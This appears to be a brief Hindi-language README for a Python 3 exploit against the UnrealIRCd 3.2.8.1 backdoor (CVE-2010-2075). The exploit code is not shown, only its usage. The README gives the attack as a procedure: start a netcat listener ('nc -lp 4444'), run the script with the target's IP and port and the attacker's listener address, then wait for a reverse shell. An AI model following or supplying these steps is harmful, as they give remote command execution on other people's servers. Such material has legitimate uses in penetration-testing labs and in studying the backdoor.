
UnrealIRCd 3.2.8.1 बैकडोर (CVE-2010-2075) के लिए Python एक्सप्लॉइट जो Netcat लिसनर के माध्यम से रिवर्स शेल प्रदान करता है।
UnrealIRCd 3.2.8.1 बैकडोर कमांड निष्पादन एक्सप्लॉइट Python 3 में (CVE-2010-2075)।
UnrealIRCd संस्करण 3.2.8.1 में एक ट्रोजन हॉर्स है जो दूरस्थ हमलावरों को मनमाने कमांड निष्पादित करने की अनुमति देता है (CVE-2010-2075)।
इस स्क्रिप्ट को बनाने के लिए मैंने Metasploit पेलोड payload/cmd/unix/reverse_perl का संदर्भ लिया।
सुनने वाले होस्ट पर Netcat लिसनर प्रारंभ करें:
nc -lp 4444
निम्नलिखित पोज़िशनल आर्ग्युमेंट्स प्रदान करते हुए स्क्रिप्ट निष्पादित करें:
python3 script.py <target> <tport> <listener> <lport>
<target> लक्ष्य होस्ट का IP पता।<tport> लक्ष्य होस्ट का पोर्ट नंबर।<listener> सुनने वाले होस्ट का IP पता।<lport> सुनने वाले होस्ट का पोर्ट नंबर।अपनी स्थानीय मशीन पर Netcat लिसनर सेटअप करें:
nc -lp 4444
लक्ष्य मशीन 192.168.1.3 TCP पोर्ट 6697 पर स्क्रिप्ट चलाएँ:
python3 script.py 192.168.1.3 6697 192.168.1.2 4444
एक मिनट प्रतीक्षा करें और Netcat लिसनर को रिवर्स शेल प्राप्त होना चाहिए।